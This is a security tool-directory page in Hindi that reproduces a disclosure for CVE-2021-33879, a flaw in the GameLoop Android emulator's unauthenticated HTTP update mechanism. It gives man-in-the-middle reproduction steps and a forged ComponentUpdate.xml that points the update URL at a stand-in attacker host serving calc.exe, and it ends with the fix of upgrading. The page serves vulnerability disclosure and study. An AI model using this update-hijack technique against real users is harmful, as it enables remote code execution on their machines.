Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2021-33879 — GameLoop अपडेट MITM | Kitploit
उपकरण/GitHubGitHub/mmiszczyk/cve-2021-33879
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणमालवेयर विश्लेषणपेनिट्रेशन टेस्टिंगआपूर्ति श्रृंखला सुरक्षा
GitHubmmiszczyk/cve-2021-33879

cve-2021-33879

GameLoop अपडेट MITM

रिपॉजिटरी देखें
145 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVEID: CVE-2021-33879

प्रभावित उत्पाद(ों) और संस्करण(ों) का नाम: GameLoop (4.1.21.90 से पहले के सभी संस्करण)

भेद्यता प्रकार: CWE-494: अखंडता जांच के बिना कोड का डाउनलोड


सारांश

GameLoop Tencent द्वारा विकसित एक Android एमुलेटर है। इसमें एक अपडेट तंत्र है जो एन्क्रिप्टेड या प्रमाणित नहीं है (MD5 हैश के अलावा, जिसे इस शोषण में हमलावर नियंत्रित कर सकता है), जिससे MITM स्थिति में हमलावर इंटरसेप्ट कर सकता है और अपने स्वयं के अपडेट पैकेज भेज सकता है जो पीड़ित मशीन पर निष्पादित होंगे।

विवरण

Tencent GameLoop 4.1.21.90 से पहले अपडेट को असुरक्षित HTTP कनेक्शन पर डाउनलोड करता था। MITM स्थिति में एक दुर्भावनापूर्ण हमलावर एक अपडेट पैकेज का वर्णन करने वाले XML दस्तावेज़ की सामग्री को गलत साबित कर सकता था, डाउनलोड URL को एक मनमाने Windows निष्पादन योग्य की ओर इंगित करने वाले URL से बदल सकता था। चूँकि एकमात्र अखंडता जांच डाउनलोड की गई फ़ाइल के MD5 चेकसम की XML दस्तावेज़ में मौजूद चेकसम से तुलना होगी, इसलिए डाउनलोड किया गया निष्पादन योग्य तब पीड़ित की मशीन पर निष्पादित होगा।

पुनरुत्पादन

  • हमलावर वातावरण सेट करें:
    • एक वेबसर्वर सेट करें, उस पर अपना निष्पादन योग्य पेलोड रखें, उसका MD5 हैश गणना करें
    • एक प्रॉक्सी सेट करें, इसे ComponentUpdate.xml के अनुरोधों को इंटरसेप्ट करने के लिए कॉन्फ़िगर करें
  • पीड़ित वातावरण सेट करें:
    • इंटरनेट कनेक्शन को हमलावर के प्रॉक्सी के माध्यम से कॉन्फ़िगर करें
    • GameLoop का एक कमजोर संस्करण स्थापित करें
  • पीड़ित: अपडेट जांच को बाध्य करें
    • GameLoop चलाएँ
    • हैमबर्गर मेनू से 'Update' पर क्लिक करें
  • हमलावर: ComponentUpdate.xml को संशोधित करें (अपने पेलोड का उपयुक्त url, md5 और filesize डालें)
root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<UpdateConfig>
	<GlobalConfig>
		<Item name="UpdateEnable" Value="1" />
	</GlobalConfig>
	<UpdatePolicy>
		<PolicyItem id="1" Enable="1" AutoUpdateRate="1" ManualUpdateRate="100" MatchUpdateOperation="2" Weight="4">
			<Condition Method="Or">
				<MatchSupplyId Type="market" MatchResult="0" Start="3.10.199.100" End="4.99.999.999" />
			</Condition>
		</PolicyItem>
	</UpdatePolicy>
	<UpdateOperation>
		<OperItem id="2" inherit="0" Desc="This is a malicious update" Title="Malicious update" text="I could serve you ransomware but I'll just spawn calc">
			<Item Type="market" url="http://attacker.local/calc.exe" md5="c4cb4fdf6369dd1342d2666171866ce5" version="5.10.199.100" filesize="32768" />
		</OperItem>
	</UpdateOperation>
</UpdateConfig>
टूल डाउनलोड करें
  • पीड़ित: 'अभी अपडेट करें' पर क्लिक करें

अपडेट संकेत

  • हमलावर का पेलोड अब पीड़ित मशीन पर निष्पादित होना चाहिए

पेलोड निष्पादित

उपाय

GameLoop का एक नया संस्करण स्थापित करें।